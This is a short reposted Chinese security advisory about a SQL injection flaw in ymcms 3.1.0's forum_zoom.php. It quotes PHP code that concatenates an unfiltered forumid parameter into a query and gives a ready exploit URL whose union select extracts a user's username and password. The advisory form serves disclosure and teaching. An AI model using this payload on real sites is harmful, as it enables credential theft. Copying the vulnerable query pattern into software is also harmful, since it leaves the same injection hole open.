ymcms SQL注入漏洞
生活随笔
收集整理的這篇文章主要介紹了
ymcms SQL注入漏洞
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
| 影響版本: ymcms3.1.0 |
| 詳細說明: forum_zoom.php 31~48行 if ($forumid != ""){ $isforum = " && forumid IN (".$forumid.") "; }else{ $isforum = ""; } //forumid明顯沒有過濾 …… $sql = "Select threadid, title, lastpost FROM ".$ym_thread_tab." Where isshow="1" ".$isforum." orDER BY ".$isaction." LIMIT 0, ".$shownum; 發生了注射 |
| 參考: misssky's BLOG |
| 解決方案: http://www.ymcms.com/ |
| 測試方法: [警 告] 以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用.風險自負! exp:[union] forum_zoom.php?forumid=15)%20and%201=2%20union%20select%201,concat(username,0x3f,password),3%20from%20user%20where%20userid=1/* |
| //Sebug.net 本安全信息由Sebug.net翻譯整理,版權所有,未經許可,不得轉載 |
轉載于:https://www.cnblogs.com/allyesno/archive/2007/08/05/843451.html
總結
以上是生活随笔為你收集整理的ymcms SQL注入漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 如何在服务器端写关闭窗口的代码?同时能够
- 下一篇: SQL Server 2005:你应该知